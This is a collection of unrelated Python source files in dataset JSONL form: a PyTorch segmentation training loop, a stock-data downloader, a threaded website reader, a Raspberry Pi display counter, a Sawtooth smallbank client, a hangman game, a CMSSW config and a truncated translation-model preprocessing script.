parser.add_argument('--cuda_id', default=0, type=int)\n parser.add_argument('--path', default='../data/', type=str)\n parser.add_argument('--path_aug', default='../data/', type=str)\n arg = parser.parse_args()\n print(arg)\n device = torch.device(\"cuda:\"+str(arg.cuda_id) if torch.cuda.is_available() else \"cpu\")\n #%%\n loader_train=PCA_Aug_Dataloader(n_epochs=100, n_batches=arg.n_batches, batch_size=64, device=device, shuffle=True,\n filename=arg.path_aug+'pca_aug_P'+str(arg.n_components)+'b'+str(arg.n_batches)+'n64',\n n_components=arg.n_components, c_max=2, flag=0, train=True, path=arg.path)\n loader_val=PCA_Aug_Dataloader(n_epochs=1, n_batches=100, batch_size=64, device=device, shuffle=False,\n filename=arg.path_aug+'pca_aug_P30b100n64',\n n_components=30, c_max=2, flag=0, train=True, path=arg.path)\n Dataset_test = DiskSet_example(arg.path, 'aug_data_example_test.txt')\n loader_test = torch.utils.data.DataLoader(dataset=Dataset_test,batch_size = 64, shuffle = False, num_workers=0)\n #%%\n filename='result/'+arg.net_name+'_disk_pca_regseg_P'+str(arg.n_components)+'b'+str(arg.n_batches)\n print('save to', filename)\n #%%\n if arg.net_name == 'Resnet18Unet':\n model = Resnet18Unet(352, 1).to(device)\n optimizer = Adamax(model.parameters(),lr = 0.001)\n history={'loss1_train':[], 'loss2_train':[], 'loss3_train':[],\n 'mrse_val':[], 'dice1_val':[], 'dice2_val':[],\n 'mrse_test':[], 'dice1_test':[], 'dice2_test':[]}\n #%% load model state and optimizer state if 
necessary\n epoch_save=arg.epoch_start-1\n if epoch_save>=0:\n load_checkpoint(filename+'_epoch'+str(epoch_save)+'.pt', model, optimizer, history)\n #%%\n for epoch in tqdm(range(epoch_save+1, arg.epoch_end), initial=epoch_save+1, total=arg.epoch_end):\n loss_train = train(model, device, optimizer, loader_train, epoch)\n mrse_val, dice1_val, dice2_val = test(model, device, loader_val)\n mrse_test, dice1_test, dice2_test = test(model, device, loader_test)\n history['loss1_train'].append(loss_train[0])\n history['loss2_train'].append(loss_train[1])\n history['loss3_train'].append(loss_train[2])\n history['mrse_val'].append(mrse_val.mean())\n history['dice1_val'].append(dice1_val.mean())\n history['dice2_val'].append(dice2_val.mean()) \n history['mrse_test'].append(mrse_test.mean())\n history['dice1_test'].append(dice1_test.mean())\n history['dice2_test'].append(dice2_test.mean()) \n #------- show result ----------------------\n display.clear_output(wait=False)\n fig1, ax1 = plot_history(history) \n display.display(fig1) \n fig2, ax2 = plt.subplots()\n ax2.hist(mrse_test, bins=50, range=(0,10))\n ax2.set_xlim(0, 10)\n display.display(fig2)\n #----------save----------------------------\n if (epoch+1)%100 == 0:\n save_checkpoint(filename+'_epoch'+str(epoch)+'.pt', model, optimizer, history, epoch)\n fig1.savefig(filename+'_epoch'+str(epoch)+'_history.png')\n fig2.savefig(filename+'_epoch'+str(epoch)+'_mrse_test.png')\n epoch_save=epoch\n plt.close(fig1)\n plt.close(fig2)\n\n","sub_path":"code/IND/Disk_pca_regseg_train.py","file_name":"Disk_pca_regseg_train.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"276423930","text":"import matplotlib.pyplot as plt\nimport fix_yahoo_finance as yf\nimport pandas as pd\n\ndef import_data(company,sdate,edate):\n '''\n company='GOOGL'\n sdate='2016-01-01'\n edate='2019-03-14'\n '''\n data = yf.download(company,sdate,edate)\n path=company+'.csv'\n data.to_csv(index=True,index_label='date',path_or_buf=path)\n data.Close.plot()\n #plt.show()\n\ndef read_full(filename):\n df=pd.read_csv(filename)\n return df\n \ndef read_spec(filename):\n df=pd.read_csv(filename)\n df = df[['Close']]\n return df\n\ndef main():\n company='AAPL'\n sdate='2016-01-01'\n edate='2019-03-14'\n choice=1\n filename=company+'.csv'\n df=pd.DataFrame()\n import_data(company,sdate,edate)\n if choice==1:\n print()\n df=read_full(filename)\n else :\n print()\n df=read_spec(filename)\n print(df)\n \n\nmain()\n \n","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"165744080","text":"\"\"\"\nעליכם קריאה של 10 אתרים ולכתוב :\nא.\tלהציג את שם האתר\nב.\tלהציג את תוכן קוד האתר בPrint\nג.\tלכתוב לתוך קובץ את תוכן האתר\nד.\tלהציג זמן כולל של הפעולות (import time)\n\n1.\tשלב ראשון בצע ללא Thread ReadSitesNoThread.py\n2.\tשלב שני בצע Thread ReadSiteThread.py\n\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport threading\n\nurl_site =[\"https://www.ynet.co.il/home/0,7340,L-8,00.html\",\n \"https://corona.mako.co.il/\",\n \"https://13tv.co.il/\",\n \"https://edition.cnn.com/\",\n \"https://www.youtube.com/?gl=IL\",\n \"https://www.calcalist.co.il/home/0,7340,L-8,00.html\",\n \"https://www.one.co.il/\",\n \"https://www.google.co.il/?hl=iw\",\n \"https://www.maariv.co.il/news\",\n \"https://www.apple.com/\"\n ]\n\n\ndef 
Deal_with_site(url):\n get_html_page = requests.get(url).content # get html code of site\n soup = BeautifulSoup(get_html_page, \"html.parser\")\n title = soup.title # get title of site\n print(\"\\033[1;35m\"+title.get_text()+\"\\033[1;37m\")\n print(soup.prettify())\n\n with open('Sitedatathread.txt', \"wb\") as writer: # create file with content of site\n writer.write(soup.prettify().encode(\"utf-8\"))\n writer.close()\n\n\nstart_time = time.perf_counter()\n\nthreads = []\nfor site in url_site: # make all the Deal sites as a thread\n th = threading.Thread(target=Deal_with_site, args=(site,))\n th.start()\n threads.append(th)\n\nfor thread in threads:\n\n thread.join()\n\nend_time = time.perf_counter()\nprint(\"Toatl Time is :\", end_time-start_time, \"sec\")\n","sub_path":"Threading/GetSitesWithThread.py","file_name":"GetSitesWithThread.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315931220","text":"import RPi.GPIO as GPIO #Header file for pi header pins.\r\nimport time #Time package that should be included with python download\r\nGPIO.setmode(GPIO.BCM) #this references the pin numbers on the pi. One could use the BOARD.\r\n\r\nsegments = (26,12,5,27,17,23,6) #this assigns the seven pins on the board to the segment tuple variable.\r\n\r\nfor segment in segments:\r\n GPIO.setup(segment, GPIO.OUT)\r\n GPIO.output(segment, 0)\r\n#the above for loop assigns the segments variables as GPIO pins and sets their output to off\r\n\r\ndigits = (13,25,24,22) #this assigns the pin numbers to a digits tuple variable\r\n\r\nfor digit in digits:\r\n GPIO.setup(digit, GPIO.OUT)\r\n GPIO.output(digit, 1)\r\n#this does the same thing as the segments for loop above but turns on the output for each of the digits\r\n\r\nnum = {' ':(0,0,0,0,0,0,0), \r\n '0':(1,1,1,1,1,1,0),\r\n '1':(0,1,1,0,0,0,0),\r\n '2':(1,1,0,1,1,0,1),\r\n '3':(1,1,1,1,0,0,1),\r\n '4':(0,1,1,0,0,1,1),\r\n '5':(1,0,1,1,0,1,1),\r\n '6':(1,0,1,1,1,1,1),\r\n '7':(1,1,1,0,0,0,0),\r\n '8':(1,1,1,1,1,1,1),\r\n '9':(1,1,1,1,0,1,1)}\r\n#this is a dictionary of tuples, this is the way to make a multi-demsional\r\n#associative array\r\n\r\ntry:\r\n for w in range(1):\r\n for x in range(0,10):\r\n s = str(x)\r\n for loop in range(0,7):\r\n GPIO.output(segments[loop], num[s[0]][loop])\r\n GPIO.output(digits[w],0)\r\n time.sleep(.5)\r\n GPIO.output(digits[w],1)\r\n\r\nfinally:\r\n GPIO.cleanup()\r\n","sub_path":"numbercount2.py","file_name":"numbercount2.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"515776823","text":"\n# should be very similar to the xo_client\n# read the transaction family description and docs and then map that into code.\n# the sawtooth_sdk protobuf libraries make that simple\n\nfrom urllib.error import HTTPError\nimport urllib.request\nfrom sawtooth_sdk.protobuf.batch_pb2 import BatchList\nfrom sawtooth_sdk.protobuf.batch_pb2 import Batch\n\nimport cbor\n\nimport protosma_pb2\n\nfrom sawtooth_signing import create_context\nfrom sawtooth_signing import CryptoFactory\n\nimport hashlib\n\nfrom sawtooth_sdk.protobuf.transaction_pb2 import TransactionHeader\nfrom sawtooth_sdk.protobuf.transaction_pb2 import Transaction\n\n\nfrom sawtooth_sdk.protobuf.batch_pb2 import BatchHeader\n\n# print(dir(protosma_pb2.SmallbankTransactionPayload))\n\n\nCUSTOMER_ID = 99999\nCUSTOMER_NAME='SPT6JfkNQFECDa3XyH0k'\n\n\ncontext = 
create_context('secp256k1')\nprivate_key = context.new_random_private_key()\nsigner = CryptoFactory(context).new_signer(private_key)\n\n\ndef _sha512_small_bank(customer_id):\n\n firstpart = hashlib.sha512('smallbank'.encode('utf-8')).hexdigest()[0:6]\n secondpart = hashlib.sha512(str(customer_id).encode('utf-8')).hexdigest()[0:64]\n\n return firstpart + secondpart\n\n\nCUSTOMER_ADDRESS = _sha512_small_bank(CUSTOMER_ID)\n\n\n# create account for customer 1\n\n'''\nmessage CreateAccountTransactionData {\n // The CreateAccountTransaction creates an account\n\n // Customer ID\n uint32 customer_id = 1;\n\n // Customer Name\n string customer_name = 2;\n\n // Initial Savings Balance (in cents to avoid float)\n uint32 initial_savings_balance = 3;\n\n // Initial Checking Balance (in cents to avoid float)\n uint32 initial_checking_balance = 4;\n }\n'''\n\n# creating new accounts\nsmall_payload = protosma_pb2.SmallbankTransactionPayload(\n payload_type=protosma_pb2.SmallbankTransactionPayload.CREATE_ACCOUNT,\n create_account=protosma_pb2.SmallbankTransactionPayload.CreateAccountTransactionData(\n customer_id=CUSTOMER_ID,\n customer_name=CUSTOMER_NAME,\n initial_savings_balance=1000000,\n initial_checking_balance=1000000\n )\n)\n\npayload_bytes = small_payload.SerializeToString()\n\nprint(small_payload)\nprint(payload_bytes)\n\nprint(hashlib.sha512(payload_bytes).hexdigest())\n\n\n# print(payload_bytes)\n\n# create transaction headers\n\n# addresses\n\n\ntxn_header_bytes = TransactionHeader(\n family_name='smallbank',\n family_version='1.0',\n inputs=[CUSTOMER_ADDRESS],\n outputs=[CUSTOMER_ADDRESS],\n signer_public_key=signer.get_public_key().as_hex(),\n # In this example, we're signing the batch with the same private key,\n # but the batch can be signed by another party, in which case, the\n # public key will need to be associated with that key.\n batcher_public_key=signer.get_public_key().as_hex(),\n # In this example, there are no dependencies. This list should include\n # an previous transaction header signatures that must be applied for\n # this transaction to successfully commit.\n # For example,\n # dependencies=['540a6803971d1880ec73a96cb97815a95d374cbad5d865925e5aa0432fcf1931539afe10310c122c5eaae15df61236079abbf4f258889359c4d175516934484a'],\n dependencies=[],\n payload_sha512=hashlib.sha512(payload_bytes).hexdigest()\n).SerializeToString()\n\n\n# print(txn_header_bytes)\n\nheader_signature = signer.sign(txn_header_bytes)\n\nprint('public key: ' + signer.get_public_key().as_hex())\nprint('signature : ' + header_signature)\n\n# two mistakes synthactical mistakes !! 
on the wiki\ntxn = Transaction(header=txn_header_bytes,\n header_signature=header_signature, payload=payload_bytes)\n\n\ntxns = [txn]\n\nbatch_header_bytes = BatchHeader(\n signer_public_key=signer.get_public_key().as_hex(),\n transaction_ids=[txn.header_signature for txn in txns],\n).SerializeToString()\n\n\n# print(signature)\n\n\nsignature = signer.sign(batch_header_bytes)\n\nbatch = Batch(\n header=batch_header_bytes,\n header_signature=signature,\n transactions=txns\n)\n\nbatch_list_bytes = BatchList(batches=[batch]).SerializeToString()\n\n\n# print(batch_list_bytes)\n\n\n# send the batches\n\ntry:\n request = urllib.request.Request(\n 'http://localhost:8008/batches',\n batch_list_bytes,\n method='POST',\n headers={'Content-Type': 'application/octet-stream'})\n response = urllib.request.urlopen(request)\n print(response.status)\n\nexcept HTTPError as e:\n response = e.file\n","sub_path":"sawtooth_clients/smallbank_client.py","file_name":"smallbank_client.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"257797125","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = 'wordlist.txt'\n\ndef load_words():\n '''\n Returns a list of valid words.\n '''\n print('Loading word list from file...')\n input_File = open(WORDLIST_FILENAME, 'r')\n content = input_File.read()\n word_list = content.split('\\n')\n try:\n word_list.remove('')\n except ValueError:\n print('There is no empty string')\n print(f'\\t {len(word_list)} words loaded.') \n return word_list\n\ndef choose_word(word_list):\n '''\n Returns a word from word_list at random\n '''\n return random.choice(word_list)\n\ndef is_word_guessed(secret_word, letters_guessed):\n '''\n This function returns True if secret_word has been guessed \n (ie, all the letters of secret_word are in letters_guessed)\n and False otherwise.\n\n Args:\n secret_word (str): the word the user is guessing.\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n bool: True for success, False otherwise.\n '''\n is_in = [each_letter in letters_guessed for each_letter in secret_word]\n return all(is_in)\n\ndef get_guessed_word(secret_word, letters_guessed):\n '''\n This function returns a string that is comprised of letters and\n underscores, based on what letters in letters_guessed are in\n secret_word.\n\n Args:\n secret_word (str): the word the user is guessing.\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n str: letters and underscores.\n '''\n list_of_chars = [each_letter if each_letter in letters_guessed else '_ ' for each_letter in secret_word]\n return ''.join(list_of_chars)\n\ndef get_available_letters(letters_guessed):\n '''\n This function returns all lowercase English letters that are\n not in letters_guessed.\n\n Args:\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n str: lowercase English letters.\n '''\n from string import ascii_lowercase\n available = list(set(ascii_lowercase) - set(letters_guessed))\n available = sorted(available)\n return ''.join(available)\n\ndef hangman(secret_word):\n '''\n Starts up an interactive game of Hangman between the user\n and the computer.\n\n Args:\n secret_word (str): the word the user is guessing.\n '''\n print('Welcome to the game, Hangman!')\n print(f'I am thinking of a word that is {len(secret_word)} letters long.')\n print('-------------')\n\n mistakes_made = 0\n max_guess = 8\n\n letters_guessed = []\n is_winner = 
False\n is_done = False\n\n while not is_done:\n print(f'You have {max_guess - mistakes_made} guesses left.')\n available_letters = get_available_letters(letters_guessed)\n print(f'Available letters: {available_letters}')\n guess = input('Please guess a letter: ').lower()\n\n if guess in letters_guessed:\n print(\"Oops! You've already guessed that letter:\", end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n elif guess in secret_word:\n letters_guessed.append(guess)\n print('Good guess:', end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n if is_word_guessed(secret_word, letters_guessed):\n is_winner = True\n is_done = True\n else:\n letters_guessed.append(guess)\n print('Oops! That letter is not in my word:', end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n mistakes_made += 1\n if mistakes_made == max_guess:\n is_done = True\n \n print('-------------')\n \n if is_winner:\n print('Congratulations, you won!')\n else:\n print(f'Sorry, you ran out of guesses. The word was {secret_word}')\n\nif __name__ == '__main__':\n word_list = load_words()\n secret_word = choose_word(word_list).lower()\n hangman(secret_word)","sub_path":"your-project/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461930912","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\noptions = VarParsing ('analysis')\noptions.parseArguments()\n\nprocess = cms.Process(\"GIFanlzrTest\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/unpackerOutput.root'\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/ccHFO-09May/unpackerOutput_3600V.root'\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/ccCF4-21Feb/unpackerOutput_3600V.root'\n options.inputFiles\n )\n)\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n destinations = cms.untracked.vstring('myDebugOutputFile.txt'),\n debugModules = cms.untracked.vstring('*'),\n message = cms.untracked.PSet(threshold = cms.untracked.vstring('DEBUG'))\n)\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10000\nprocess.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')\n\nprocess.load(\"Configuration/Geometry/GeometryIdeal2015Reco_cff\")\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\nprocess.load(\"Configuration/StandardSequences/RawToDigi_Data_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"RecoMuon.MuonSeedGenerator.standAloneMuonSeeds_cff\")\n\nprocess.GlobalTag.globaltag = '74X_dataRun2_Prompt_v0'\n\nprocess.options = cms.untracked.PSet(\n SkipEvent = 
cms.untracked.vstring('LogicError','ProductNotFound')\n)\n\n#=====================================================================================================\n#http://cmslxr.fnal.gov/source/EventFilter/CSCRawToDigi/plugins/CSCDCCUnpacker.cc\n#http://cmsdoxygen.web.cern.ch/cmsdoxygen/CMSSW_7_5_1/doc/html/db/dd7/cscUnpacker__cfi_8py_source.html\n#muonCSCDigis = EventFilter.CSCRawToDigi.muonCSCDCCUnpacker_cfi.muonCSCDCCUnpacker.clone()\nprocess.muonCSCDigis.SuppressZeroLCT =cms.untracked.bool(False)\n# EventDump works only partly in CMSSW_7_5_1\nprocess.muonCSCDigis.FormatedEventDump = cms.untracked.bool(False)\n# Unpack general status digis?\nprocess.muonCSCDigis.UnpackStatusDigis = cms.bool(True) \n# Unpack FormatStatus digi?\nprocess.muonCSCDigis.UseFormatStatus = cms.bool(True)\n# Turn on lots of output\n#process.muonCSCDigis.Debug = cms.untracked.bool(False)\n#process.muonCSCDigis.PrintEventNumber = cms.untracked.bool(False)\n# Visualization of raw data in corrupted events\n#process.muonCSCDigis.VisualFEDInspect = cms.untracked.bool(False)\n#process.muonCSCDigis.VisualFEDShort = cms.untracked.bool(False)\n#=====================================================================================================\n\n \nprocess.GIFanlzrTest = cms.EDAnalyzer('GIFanlzr',\n wireDigiTag = cms.InputTag(\"muonCSCDigis\", \"MuonCSCWireDigi\"),\n alctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCALCTDigi'),\n clctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCCLCTDigi'),\n lctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCCorrelatedLCTDigi'),\n stripDigiTag = cms.InputTag(\"muonCSCDigis\", 'MuonCSCStripDigi'),\n comparatorDigiTag = cms.InputTag(\"muonCSCDigis\", \"MuonCSCComparatorDigi\"),\n tmbStatusDigiTag = cms.InputTag(\"muonCSCDigis\",\"MuonCSCTMBStatusDigi\"),\n #cscRecHitTag = cms.InputTag(\"csc2DRecHits\",\"\"),\n #cscSegTag = cms.InputTag(\"cscSegments\"),\n \n # technical info - statis digis, requires process.muonCSCDigis.UnpackStatusDigis = cms.bool(True) \n chamberTag = cms.untracked.int32(3), # 0 - both; 1 - ME1/1; 2 - ME2/1; # 3 - minCSC(904); \n anodeTag = cms.untracked.int32(0), # 0 - none; 1 - proceed; 2 - anodes only (test11)\n cathodeTag = cms.untracked.int32(1), # 0 - none; 1 - proceed; 2 - cathodes only (test11c) \n lctTag = cms.untracked.int32(0), # 0 - none; 1 - proceed; \n tmbTag = cms.untracked.int32(1), # 0 - none; 1 - proceed;\n debugTag = cms.untracked.int32(2), # 0 - no debug, 1 analyzer, 2 all (event printouts) \n outputFileName = cms.untracked.string(options.outputFile) \n)\n\n#process.p = cms.Path(process.muonCSCDigis)\nprocess.p = cms.Path(process.muonCSCDigis*process.GIFanlzrTest)\n","sub_path":"files_for_CMSSW_7_5_1/GifCSC/GIFanlzr/runGIFanlzr_cfg.py","file_name":"runGIFanlzr_cfg.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"107604281","text":"import time\r\nimport math\r\nimport pickle\r\nimport collections\r\nfrom nltk import word_tokenize\r\nimport nltk\r\nimport argparse\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.contrib import rnn\r\nimport re\r\nimport numpy as np\r\nfrom gensim.models import KeyedVectors\r\nfrom sklearn.decomposition import PCA\r\nfrom matplotlib import pyplot\r\n\r\n# argument\r\nargs = 
argparse.ArgumentParser()\r\nargs.add_argument(\"--language_src\")\r\nargs.add_argument(\"--language_targ\")\r\nargs.add_argument(\"--vocab_src\")\r\nargs.add_argument(\"--vocab_targ\")\r\nargs.add_argument(\"--word_emb_src\")\r\nargs.add_argument(\"--word_emb_targ\")\r\nargs.add_argument(\"--num_layers\")\r\nargs.add_argument(\"--num_hiddens\")\r\nargs.add_argument(\"--learning_rate\")\r\nargs.add_argument(\"--keep_prob\")\r\nargs.add_argument(\"--beam_width\")\r\nargs.add_argument(\"--batch_size\")\r\nargs.add_argument(\"--checkpoint\")\r\n\r\nargs = vars(args.parse_args())\r\n\r\n# Set paths\r\ntrain_english_path = args[\"language_src\"]\r\ntrain_vietnamese_path = args[\"language_targ\"]\r\nword2int_english_path = args[\"vocab_src\"] + \"word2int.pickle\"\r\nint2word_english_path = args[\"vocab_src\"] + \"int2word.pickle\"\r\nword2int_vietnamese_path = args[\"vocab_targ\"] + \"word2int.pickle\"\r\nint2word_vietnamese_path = args[\"vocab_targ\"] + \"int2word.pickle\"\r\n\r\nprint(\"Get and prepare data ...\")\r\n\r\ndef getSentList(path, n_sents):\r\n sentList = []\r\n with open(path) as f:\r\n for line in f.readlines()[:n_sents]:\r\n w = line.lower()\r\n w = re.sub(r\"([?.!,¿])\", r\" \\1 \", w)\r\n w = re.sub(r'[\" \"]+', \" \", w)\r\n #w = re.sub(r\"[^a-zA-Z?.!,¿]+\", \" \", w)\r\n w = w.strip()\r\n\r\n # Add sent to the list\r\n sentList.append(w)\r\n\r\n return sentList\r\n\r\n\r\n# Get train_english and train_vietnamese\r\ntrain_english = getSentList(train_english_path, 799622)\r\ntrain_vietnamese = getSentList(train_vietnamese_path, 799622)\r\n\r\ni = 0\r\nwhile(True):\r\n if len(train_english[i]) == 0 or len(train_vietnamese[i]) == 0:\r\n del train_english[i]\r\n del train_vietnamese[i]\r\n i += 1\r\n if i >= len(train_english):\r\n break\r\n'''\r\ni = 0\r\nwhile(True):\r\n if len(train_english[i]) >= 100 or len(train_vietnamese[i]) >= 100:\r\n del train_english[i]\r\n del train_vietnamese[i]\r\n i += 1\r\n if i >= len(train_english):\r\n break\r\n'''\r\n\r\nnltk.download('punkt')\r\n\r\n\r\nwords_english = []\r\n# Need to modify this later\r\nfor sent in train_english:\r\n for word in word_tokenize(sent):\r\n words_english.append(word)\r\n\r\nwords_vietnamese = []\r\n# Need to modify this later\r\nfor sent in train_vietnamese:\r\n for word in word_tokenize(sent):\r\n words_vietnamese.append(word)\r\n\r\n\r\n# Create word2int and int2word dictionary\r\nword_counter = collections.Counter(words_english).most_common()\r\n\r\nword2int_english = dict()\r\nword2int_english[\"\"] = 0\r\nword2int_english[\"\"] = 1\r\nword2int_english[\"\"] = 2\r\nword2int_english[\"\"] = 3\r\nfor word, _ in word_counter:\r\n word2int_english[word] = len(word2int_english)\r\n\r\nint2word_english = dict(\r\n zip(word2int_english.values(), word2int_english.keys()))\r\n\r\n# Save word2int and int2word into pickle file\r\nwith open(word2int_english_path, 'wb') as f:\r\n pickle.dump(word2int_english, f)\r\n\r\nwith open(int2word_english_path, 'wb') as f:\r\n pickle.dump(int2word_english, f)\r\n\r\n\r\n# Create word2int and int2word dictionary\r\nword_counter = collections.Counter(words_vietnamese).most_common()\r\n\r\nword2int_vietnamese = dict()\r\nword2int_vietnamese[\"\"] = 0\r\nword2int_vietnamese[\"\"] = 1\r\nword2int_vietnamese[\"\"] = 2\r\nword2int_vietnamese[\"\"] = 3\r\nfor word, _ in word_counter:\r\n word2int_vietnamese[word] = len(word2int_vietnamese)\r\n\r\nint2word_vietnamese = dict(\r\n zip(word2int_vietnamese.values(), word2int_vietnamese.keys()))\r\n\r\n# Save word2int and int2word into pickle 
file\r\nwith open(word2int_vietnamese_path, 'wb') as f:\r\n pickle.dump(word2int_vietnamese, f)\r\n\r\nwith open(int2word_vietnamese_path, 'wb') as f:\r\n pickle.dump(int2word_vietnamese, f)\r\n\r\n\r\n# Convert input data from text to int\r\ndef get_intSeq_english(data_list, max_length, padding=False):\r\n seq_list = list()\r\n for sent in data_list:\r\n # Get tokens in each sent\r\n words = word_tokenize(sent)\r\n\r\n # Use this for train_english\r\n if(padding):\r\n # Make all sents have the same length as max_length\r\n if(len(words) < max_length):\r\n words = words + (max_length-len(words))*[\"<pad>\"]\r\n else:\r\n words = words[:max_length]\r\n\r\n # Use this for train_vietnamese\r\n else:\r\n words = words[:(max_length-1)]\r\n\r\n # Convert word to its corresponding int value\r\n # If the word doesn't exist, use the value of \"<unk>\" by default\r\n int_seq = [word2int_english.get(\r\n word, word2int_english[\"<unk>\"]) for word in words]\r\n\r\n # Add int_seq to seq_list\r\n seq_list.append(int_seq)\r\n\r\n return seq_list\r\n\r\n# Convert input data from text to int\r\n\r\n\r\ndef get_intSeq_vietnamese(data_list, max_length, padding=False):\r\n seq_list = list()\r\n for sent in data_list:\r\n # Get tokens in each sent\r\n words = word_tokenize(sent)\r\n\r\n # Use this for train_english\r\n if(padding):\r\n # Make all sents have the same length as max_length\r\n if(len(words) < max_length):\r\n words = words + (max_length-len(words))*[\"<pad>\"]\r\n else:\r\n words = words[:max_length]\r\n\r\n # Use this for train_vietnamese\r\n else:\r\n words = words[:(max_length-1)]\r\n\r\n # Convert word to its corresponding int value\r\n # If the word doesn't exist, use the value of \"<unk>\" by default\r\n int_seq = [word2int_vietnamese.get(\r\n word, word2int_vietnamese[\"<unk>\"]) for word in words]\r\n\r\n # Add int_seq to seq_list\r\n seq_list.append(int_seq)\r\n\r\n return seq_list\r\n\r\n\r\n# Define the max length of english and vietnamese\r\nenglish_max_len = 50\r\nvietnamese_max_len = 50\r\n\r\n# Get the sequence of int value\r\ntrain_english_intSeq = get_intSeq_english(\r\n train_english, english_max_len, padding=True)\r\ntrain_vietnamese_intSeq = get_intSeq_vietnamese(\r\n train_vietnamese, vietnamese_max_len)\r\n\r\n\r\n# load model\r\nword_embed_english_w2v = KeyedVectors.load_word2vec_format(\r\n args[\"word_emb_src\"], binary=True, unicode_errors='ignore')\r\n# Sort the int2word\r\nint2word_sorted = sorted(int2word_english.items())\r\n\r\n# Get the list of word embedding corresponding to int value in ascending order\r\nword_emb_list = list()\r\nembedding_size = len(word_embed_english_w2v['the'])\r\nfor int_val, word in int2word_sorted:\r\n # Add the pretrained embedding if it exists\r\n if(word in word_embed_english_w2v):\r\n word_emb_list.append(word_embed_english_w2v[word])\r\n\r\n # Otherwise, the value of word embedding is 0\r\n else:\r\n word_emb_list.append(np.zeros([embedding_size], dtype=np.float32))\r\n\r\n# Assign random vectors to the <s>, </s> tokens\r\nword_emb_list[2] = np.random.normal(0, 1, embedding_size)\r\nword_emb_list[3] = np.random.normal(0, 1, embedding_size)\r\n\r\n# the final word embedding\r\nword_embed_english = np.array(word_emb_list)\r\n\r\n\r\n# load model\r\nword_embed_vietnamese_w2v = KeyedVectors.load_word2vec_format(\r\n args[\"word_emb_targ\"], binary=True, unicode_errors='ignore')\r\n\r\n# Sort the int2word\r\nint2word_sorted = sorted(int2word_vietnamese.items())\r\n\r\n# Get the list of word embedding corresponding to int value in ascending order\r\nword_emb_list = list()\r\nembedding_size 
= len(word_embed_vietnamese_w2v['the'])\r\nfor int_val, word in int2word_sorted:\r\n # Add the pretrained embedding if it exists\r\n if(word in word_embed_vietnamese_w2v):\r\n word_emb_list.append(word_embed_vietnamese_w2v[word])\r\n\r\n # Otherwise, the value of word embedding is 0\r\n else:\r\n word_emb_list.append(np.zeros([embedding_size], dtype=np.float32))\r\n\r\n# Assign random vectors to the <s>, </s> tokens\r\nword_emb_list[2] = np.random.normal(0, 1, embedding_size)\r\nword_emb_list[3] = np.random.normal(0, 1, embedding_size)\r\n\r\n# the final word embedding\r\nword_embed_vietnamese = np.array(word_emb_list)\r\n\r\n\r\ndef get_batches(input_data, output_data, batch_size):\r\n # Convert input and output data from list to numpy array\r\n input_data = np.array(input_data)\r\n output_data = np.array(output_data)\r\n\r\n # Number of batches per epoch\r\n num_batches_epoch = math.ceil(len(input_data)/batch_size)\r\n for batch_num in range(num_batches_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, len(input_data))\r\n yield input_data[start_index:end_index], output_data[start_index:end_index]\r\n\r\n\r\n#CNN + GLU\r\ndef position_encoding(sentence_size, embedding_size):\r\n encoding = np.ones((sentence_size, embedding_size), dtype=np.float32)\r\n ls = sentence_size + 1\r\n le = embedding_size + 1\r\n for k in range(1, le):\r\n for j in range(1, ls):\r\n encoding[j-1, k-1] = (1.0 - j/float(ls)) - (\r\n k / float(le)) * (1. - 2. * j/float(ls))\r\n\r\n return encoding\r\n\r\n\r\ndef _create_position_embedding(embedding_dim, num_positions, lengths, maxlen):\r\n # Create constant position encodings\r\n position_encodings = tf.constant(position_encoding(num_positions, embedding_dim))\r\n\r\n # Slice to size of current sequence\r\n pe_slice = position_encodings[:maxlen, :]\r\n # 